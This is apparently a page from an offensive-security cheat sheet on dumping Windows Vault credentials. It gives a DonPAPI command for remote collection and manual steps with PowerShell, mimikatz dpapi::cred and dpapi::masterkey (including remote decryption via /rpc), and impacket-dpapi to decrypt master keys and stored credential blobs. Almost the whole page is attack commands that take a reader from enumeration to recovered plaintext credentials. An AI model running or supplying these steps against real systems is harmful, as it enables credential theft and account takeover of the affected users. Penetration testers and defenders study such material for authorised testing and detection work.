Dumping Credentials from Windows Vault

We may be able to retrieve credentials if Windows Vault credentials are stored some folders.

Automation

Using DonPAPI, we can dump credentials remotely.

donpapi collect -u 'username' -p 'password' -d example.local --dc-ip <target-ip> -t ALL --fetch-pvk

Manual Dumping

1. Enumerate Credentials

# Under %APPDATA% folder
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\

# Under %LOCALAPPDATA% folder
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Credentials\

2. Dump Credential Information

mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\123ABC...
# or
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\123ABC...

We can retrieve the guidMasterKey value that is used for the next section.

3. Decrypt MasterKey

The DPAPI keys are stored under %APPDATA%\Microsofr\Protect\ or %LOCALAPPDATA%\Microsoft\Protect\ folder. These keys are used for encrypting

# Under %APPDATA%
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\

# Under %LOCALAPPDATA%
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Protect\
dir C:\Users\<user>\AppData\Local\Microsoft\Protect\
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\
dir  C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\

Now decrypt the master keys:

# /rpc: Remotely decrypt the MasterKey
mimikatz # dpapi::masterkey /in:C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\{STRING} /rpc

We can get the key value that is the decrypted Master Key.

Alternatively, we can use impacket-dpapi command in our attack machine. We need to download the protected file under the C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<sid>\ in the target Windows machine.

impacket-dpapi masterkey -file <protected_file> -sid <user_sid> -password <password>

4. Dump Credentials

We can dump credentials using the collected Credential value and decrypted Master Key (domainkey).

# Specify '/<guidMasterKey>::<masterkey>'
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\123ABC... /01234567-890abcde...::abcdef...

Alternatively, we can use impacket-dpapi command in our attack machine. We need to download the credential file under the C:\Users\<user>\AppData\Roaming\Microsoft\Credentials in the target Windows machine.

impacket-dpapi credential -file <credential_file> -key <decrypted_key>

References

PreviousDumping Credentials via keymgr.dll NextDumping Windows Password Hashes

Last updated 1 month ago

hashtagAutomation

hashtagManual Dumping

hashtag1. Enumerate Credentials

hashtag2. Dump Credential Information

hashtag3. Decrypt MasterKey

hashtag4. Dump Credentials

hashtagReferences